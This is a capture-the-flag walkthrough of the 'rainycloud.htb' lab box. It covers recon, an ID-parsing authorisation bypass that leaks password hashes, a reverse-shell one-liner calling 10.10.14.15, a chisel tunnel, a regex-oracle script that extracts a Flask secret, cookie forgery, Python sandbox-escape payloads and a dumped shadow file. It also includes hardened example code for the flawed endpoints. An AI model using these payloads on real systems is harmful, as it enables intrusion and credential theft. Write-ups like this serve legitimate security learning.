Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.184
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-18 13:01 CST
Nmap scan report for 10.10.11.184
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48dde361dc5d5878f881dd6172fe6581 (ECDSA)
|_ 256 adbf0bc8520f49a9a0ac682a2525cd6d (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://rainycloud.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.90 seconds

80

A hosts entry is needed; the site is a hosting service:

10.10.11.184 rainycloud.htb

Registration is disabled. On a failed login the page source contains a hint message, which reveals the application path and that the backend is Python:

Subdomain scan

Subdomain enumeration finds a dev host, which responds with 403:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://rainycloud.htb/" -H 'Host: FUZZ.rainycloud.htb' -fs 229

dev [Status: 403, Size: 26, Words: 5, Lines: 1, Duration: 264ms]

Directory scan

Directory enumeration finds an api path:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://rainycloud.htb

/api (Status: 308) [Size: 239] [--> http://rainycloud.htb/api/]
/login (Status: 200) [Size: 3254]
/logout (Status: 302) [Size: 189] [--> /]
/new (Status: 302) [Size: 199] [--> /login]
/register (Status: 200) [Size: 3686]

api/user

There appear to be three users, but requesting them directly returns an error saying other users' info may not be viewed. A simple bypass (the ownership check only fires for a plain integer id, while the lookup still resolves "1.0" to user 1):

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://rainycloud.htb/api/user/ --exclude-length 3

/01 (Status: 200) [Size: 50]
/03 (Status: 200) [Size: 50]
/1 (Status: 200) [Size: 50]
/02 (Status: 200) [Size: 50]
/2 (Status: 200) [Size: 50]
/3 (Status: 200) [Size: 50]

$ curl "http://rainycloud.htb/api/user/1"
{"Error":"Not allowed to view other users info!"}

$ curl "http://rainycloud.htb/api/user/1.0"
{"id":1,"password":"$2a$10$bit.DrTClexd4.wVpTQYb.FpxdGFNPdsVX8fjFYknhDwSxNJh.O.O","username":"jack"}

{"id":2,"password":"$2a$05$x4nSvCqGHZBmBQnmNM2nXeWDzVvvsXaJiHsSv1pwZnxrcBFbOibZS","username":"root"}
{"id":3,"password":"$2b$12$WTik5.ucdomZhgsX6U/.meSgr14LcpWXsCA0KxldEw8kksUtDuAuG","username":"gary"}
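Why "1.0" slips past a check that "1" fails, and what a strict check looks like. This is an added example, not the box's own code: the weak handler is an assumed reconstruction of the pattern (authorise on the raw path string, then coerce loosely for the lookup), and USERS is a constructed sample with no hashes.

```python
import re

# Constructed sample mirroring the ids seen under /api/user (no password hashes).
USERS = {1: "jack", 2: "root", 3: "gary"}

NOT_ALLOWED = {"Error": "Not allowed to view other users info!"}


def weak_lookup(path_id: str, session_uid: int):
    """Assumed weak pattern: the ownership check only fires for pure digit
    strings, but the record lookup coerces loosely (as a SQL layer would)."""
    if path_id.isdigit() and int(path_id) != session_uid:
        return NOT_ALLOWED
    try:
        uid = int(float(path_id))  # "1.0" -> 1, and the check above never ran
    except ValueError:
        return None
    return {"id": uid, "username": USERS[uid]} if uid in USERS else None


# Canonical form only: a positive integer with no leading zeros, sign, dot or exponent.
STRICT_ID = re.compile(r"[1-9][0-9]{0,9}")


def strict_lookup(path_id: str, session_uid: int):
    """Hardened: canonicalise first, authorise on the canonical value, and
    reject every other spelling ("1.0", "01", "+1", "1e0") before any lookup."""
    if not STRICT_ID.fullmatch(path_id):
        return {"Error": "Invalid user id"}
    uid = int(path_id)
    if uid != session_uid:
        return NOT_ALLOWED
    return {"id": uid, "username": USERS[uid]} if uid in USERS else None
```

The point is that the authorisation decision and the data lookup must operate on the same canonical value; any parsing tolerance between the two is an authorisation bypass.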

hash crack

Cracking the three hashes recovers gary's password:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

rubberducky (?)

Containers

Log in with the recovered credentials, create a container, and run an arbitrary command in it to get a container shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

chisel

The earlier results showed a dev subdomain that returns 403 from outside, so set up a tunnel and reach it from inside the container:

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# inside the container
wget http://10.10.14.15:7777/chisel_1.7.6_linux_amd64
chmod +x chisel_1.7.6_linux_amd64
./chisel_1.7.6_linux_amd64 client --max-retry-count=1 10.10.14.15:9999 R:8888:172.18.0.1:80

Then add a hosts entry:

127.0.0.1     dev.rainycloud.htb

Now dev is reachable:

dev.rainycloud.htb

dev also exposes some APIs, including a healthcheck:

healthcheck

This endpoint accepts POST requests; the required parameters can be constructed from the responses obtained earlier:

It clearly matches a caller-supplied regex against the contents of a caller-supplied file and only returns true or false, so the contents of any readable file can be recovered character by character through that oracle.
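One way such a healthcheck could be hardened against this kind of match oracle. This is an added example, not the box's code: CHECK_ROOT, the named pattern types and the injected read_file are assumptions. The regex is never taken from the caller, the file parameter must resolve inside one directory, and only a coarse status is returned.

```python
import os
import re

CHECK_ROOT = "/var/www/rainycloud/healthchecks"  # assumed directory for probe files

# Server-side patterns only: there is deliberately no "custom" type.
PATTERNS = {
    "nginx": re.compile(r"^Active connections: \d+", re.M),
    "service": re.compile(r"^status=running$", re.M),
}


def is_under_root(requested: str, root: str = CHECK_ROOT) -> bool:
    """True only if the canonical path of `requested` stays inside `root`.
    Absolute paths, '../' segments and symlink hops are normalised away first."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, requested))
    return os.path.commonpath([root, target]) == root


def healthcheck(file_param: str, check_type: str, read_file):
    """Returns a coarse status dict. `read_file(path)` is injected so the
    logic can be exercised without touching the filesystem."""
    if check_type not in PATTERNS:
        return {"status": "unknown type"}
    if not is_under_root(file_param):
        return {"status": "invalid file"}
    path = os.path.realpath(os.path.join(CHECK_ROOT, file_param))
    content = read_file(path)
    return {"status": "ok" if PATTERNS[check_type].search(content) else "degraded"}
```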

SECRET_KEY

From the earlier information we know the backend is Python, so fuzz for SECRET_KEY:

file=/var/www/rainycloud/FUZZ.py&type=custom&pattern=^SECRET_KEY.*'

Fuzzing yields:

f77dd59f50ba412fcfbd3e653f8f3f2ca97224dd53cf6304b4c86658a75d8f67

file_fuzz.py

import json
import re
import string

import requests

# Candidate characters for each position. They are escaped before being placed
# in the regex so that "." or "$" cannot produce a false positive match.
allchars = string.printable
# Replace with a valid session cookie for dev.rainycloud.htb
cookies = {'session': 'session_cookie'}

s = requests.Session()
pattern = ""  # prefix of the secret recovered so far

while True:
    matched = False
    for c in allchars:
        try:
            rsp = s.post('http://dev.rainycloud.htb:8888/api/healthcheck', {
                'file': '/var/www/rainycloud/secrets.py',
                'type': 'custom',
                'pattern': "^SECRET_KEY = '" + re.escape(pattern + c) + ".*"
            }, cookies=cookies)
        except requests.RequestException as e:
            print(e)
            break
        try:
            result = json.loads(rsp.content)['result']
        except (ValueError, KeyError):
            # Unexpected body (e.g. expired session): show it and stop
            print(rsp.content)
            break
        if result:
            pattern += c
            print(pattern)
            matched = True
            break
        print(c)
    if not matched:
        # No character extends the prefix, so the value is complete
        print("SECRET_KEY = '" + pattern + "'")
        break

jack secrets

With the secret, arbitrary session cookies can be forged; change the username to jack, the other user found earlier:

flask-unsign --sign --cookie "{'username': 'jack'}" --secret 'f77dd59f50ba412fcfbd3e653f8f3f2ca97224dd53cf6304b4c86658a75d8f67'

eyJ1c2VybmFtZSI6ImphY2sifQ.Y05Gog.GRPXrP7KBA6mP1OiM9H9cWyiWFk

Replace the cookie and jack's secrets container becomes visible:

Get a shell in that container the same way. The process list shows a sleep process that has a mount, from which jack's private key is obtained:

jack_id_rsa


user flag

Log in as jack over SSH with the private key:

jack_adm

jack can run a specified program as jack_adm; the name alone says it is a Python sandbox escape challenge:

Sandbox escape

().__class__.__mro__[1].__subclasses__()[144] -> warnings.catch_warnings

echo 'print(().__class__.__mro__[1].__subclasses__()[144].__init__.__globals__["__builtins__"]["__loader__"]().load_module("builtins").__import__("os").system("whoami"))' > /tmp/test && sudo -u jack_adm /usr/bin/safe_python /tmp/test

echo 'print(().__class__.__mro__[1].__subclasses__()[144].__init__.__globals__["__builtins__"]["__loader__"]().load_module("builtins").__import__("os").system("bash -i"))' > /tmp/test && sudo -u jack_adm /usr/bin/safe_python /tmp/test

Privilege escalation information

There is only one program of interest, which appears to hash a given password after appending a salt. Cracking the hash produced for an empty password recovers the salt; appending that salt to a wordlist then cracks the root hash obtained earlier from api/user:

sudo john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/md5decryptor-uk.txt

Sup3rDup3r

sed 's/$/Sup3rDup3r/' /usr/share/wordlists/rockyou.txt > newrockyou.txt

sudo john --wordlist=newrockyou.txt hash.txt

246813579Sup3rDup3r

root flag

Switch to root with the cracked password:

(This box is very CTF-like.)

shadow

root:$y$j9T$5SIveCET7DEtfdvKf0xbB1$XK4FfV4Ud4KKP3tJGSpYrYQDFofln6ZOP3jbd2O1mL6:19256:0:99999:7:::
jack:$y$j9T$ldTcnggvK0yHbGNv0.aKi0$vpHrVNFy1sfJecOtDaaQiKK8Da2AFG7fYUyJwDC5Gg0:19131:0:99999:7:::
jack_adm:$y$j9T$6eiMKhY4J8eSrAtVSP44K0$U6UClG5Inrs5fAtJQy3gjZJ99YGd.7VocPcWs.78C25:19147:0:99999:7:::

root_id_rsa


References